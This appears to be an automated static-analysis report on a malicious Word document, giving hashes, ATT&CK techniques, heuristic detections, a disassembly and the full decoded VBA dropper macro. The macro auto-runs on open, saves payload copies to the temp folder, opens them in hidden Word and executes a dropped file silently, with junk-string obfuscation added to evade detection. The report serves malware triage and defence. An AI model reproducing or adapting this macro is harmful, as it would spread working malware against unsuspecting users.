Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cb1db07d891e8ab9…

MALICIOUS

Office (OLE)

154.0 KB Created: 2016-04-28 08:33:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 065ab1f228d14047b0937f18e3ae6a1a SHA-1: 9b72d7ce1ef63b5eeafacf6f50c2c653a769c6d1 SHA-256: cb1db07d891e8ab9433ec28556bab79658ea9bd901f14289ecbe461884ac6906
554 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1137.002 DLL Search Order Hijacking T1204.002 Malicious File T1566.001 Spearphishing Attachment

This document is malicious due to the presence of obfuscated VBA macros that trigger on opening. The macros attempt to execute an embedded PE file and leverage CreateObject to likely download and run a second-stage payload. The use of AutoOpen and Workbook_Open macros, along with the embedded executable, strongly suggests a downloader or droppper functionality.

Heuristics 17

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedChr-6203136-0
  • XOR-encoded strings (key 0x79) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0x79: 'LoadLibraryA', 'GetProcAddress', 'ExitProcess', 'CreateFileA', 'InternetOpenA', 'HttpOpenRequestA', 'HttpSendRequestA', 'WriteProcessMemory'
    Disassembly
    Attempted x86 opcode disassembly
    0000BEFD  3516181d35        xor eax, 0x351d1816
0000BF02  101b              adc byte ptr [ebx], bl
0000BF04  0b18              or ebx, dword ptr [eax]
0000BF06  0b00              or eax, dword ptr [eax]
0000BF08  387979            cmp byte ptr [ecx + 0x79], bh
0000BF0B  3c7b              cmp al, 0x7b
0000BF0D  3e1c0d            sbb al, 0xd
0000BF10  290b              sub dword ptr [ebx], ecx
0000BF12  16                push ss
0000BF13  1a38              sbb bh, byte ptr [eax]
0000BF15  1d1d0b1c0a        sbb eax, 0xa1c0b1d
0000BF1A  0a7979            or bh, byte ptr [ecx + 0x79]
0000BF1D  b9783e1c0d        mov ecx, 0xd1c3e78
0000BF22  3a0c0b            cmp cl, byte ptr [ebx + ecx]
0000BF25  0b1c17            or ebx, dword ptr [edi + edx]
0000BF28  0d290b161a        or eax, 0x1a160b29
0000BF2D  1c0a              sbb al, 0xa
0000BF2F  0a79cc            or bh, byte ptr [ecx - 0x34]
0000BF32  793a              jns 0xbf6e
0000BF34  0b1c18            or ebx, dword ptr [eax + ebx]
0000BF37  0d1c2d110b        or eax, 0xb112d1c
0000BF3C  1c18              sbb al, 0x18
0000BF3E  1d7979323c        sbb eax, 0x3c327979
0000BF43  2b37              sub esi, dword ptr [edi]
0000BF45  3c35              cmp al, 0x35
0000BF47  4a                dec edx
0000BF48  4b                dec ebx
0000BF49  57                push edi
0000BF4A  1d15157979        sbb eax, 0x79791515
0000BF4F  4b                dec ebx
0000BF50  7a0e              jp 0xbf60
0000BF52  0a09              or cl, byte ptr [ecx]
0000BF54  0b10              or edx, dword ptr [eax]
0000BF56  17                pop ss
0000BF57  0d1f38792c        or eax, 0x2c79381f
0000BF5C  2a                .byte 0x2a
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim hhf As Variant
hhf = Shell(uyt, 0)
End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
Set meLaTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD)
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub AutoOpen()
    VBJHQWD = "12kj12vhg12" & ";12[]1l '1"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Sub Workbook_Open()
    GhbGGbv
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    End Function
Sub Auto_Open()
    Lashature
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TTGDFW = FygGr(3 + 90 + sts)
DBDDW = Environ(TYGE) + TTGDFW
JIEKR = "." & "tmp" & ""
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3013 bytes
SHA-256: 69313b5a5e675995433c629062c9a674f7284a9c7a616bcd101b4cebdc51b842
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    VBJHQWD = "12kj12vhg12" & ";12[]1l '1"
    GhbGGbv
End Sub
Sub Workbook_Open()
    GhbGGbv
End Sub
Sub GhbGGbv()
    Lashature
End Sub
Sub Lashature()
Dim bbgd As Boolean, sts As Integer, YGEW As String
VBHJQW = "1h2jben1v"
sts = -42 + 41
TYGE = "T" & "EM" & ""
TYGE = TYGE & "P"
bbgd = False
On Error Resume Next
Dim WOIEW As String
TTGDFW = FygGr(3 + 90 + sts)
DBDDW = Environ(TYGE) + TTGDFW
JIEKR = "." & "tmp" & ""
FFDRRF = "" & ".rtf"
LQWDO = DBDDW

FFFNNNF = LQWDO + "byfe" + FFDRRF
SSHHDD = DBDDW & "jwud" + FFDRRF
WOIEW = DBDDW & "" & "s3" & JIEKR

FssGeww (FFFNNNF)
FssGeww (SSHHDD)

Module1.Tyryka (2)
BHJASD = Chr(102 + 8)
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
Set meLaTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD)
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
meLaTure.Visible = bbgd
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
HUIQWD = "1k2lj 3l12jk12" & "k1j2jkh3123"
meLaTure.Documents.Open (FFFNNNF)
Module1.Tyryka (2)
HYUASGD = Module1.Girow(WOIEW)
Module1.Tyryka (3)
meLaTure.Quit
Set meLaTure = Nothing
End Sub
Public Function FygGr(wbrw As Integer)
    FygGr = Chr(wbrw)
End Function
Public Function FssGeww(vnhe As String)
    ActiveDocument.SaveAs FileName:=vnhe, FileFormat:=5 + 1
End Function
Public Function TYGEvs()
    TYGEvs = "T" & "EM"
End Function
Sub Auto_Open()
    Lashature
End Sub







Attribute VB_Name = "Module1"
Sub Tyryka(Lknd As Long)
bfh = 53
Dim Khge As Long, Rtge As Long
Rtge = Lknd + Timer
Khge = Rtge
Do While Timer < Khge
vhue = 64 * 3 * 4 * 1 * 1 * 3 * 1
Loop
bfhre = 93 + 1
VAYTWGD = ";l1k23 ;l12" & "12j"
TWQYJDA = "'1;2l '12;"
BFHJASD = "1h2jkh32121"
End Sub
Public Function Girow(uyt As String)
Dim hhf As Variant
hhf = Shell(uyt, 0)
End Function
embedded_office_0000624c.exe embedded-pe Office MZ+PE at offset 0x624C 132569 bytes
SHA-256: 9e72ca4bb7e17a1e59015f971a9c6a05f73dc197b2c2accef2fe41bebbe03493
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1523370757/Ole10Native 107206 bytes
SHA-256: 4c2d816070439979baaefafa061c0873ad2aa9838e8fec3bf40be0c0da313274

Open this report in the interactive analyzer, or submit your own file for analysis.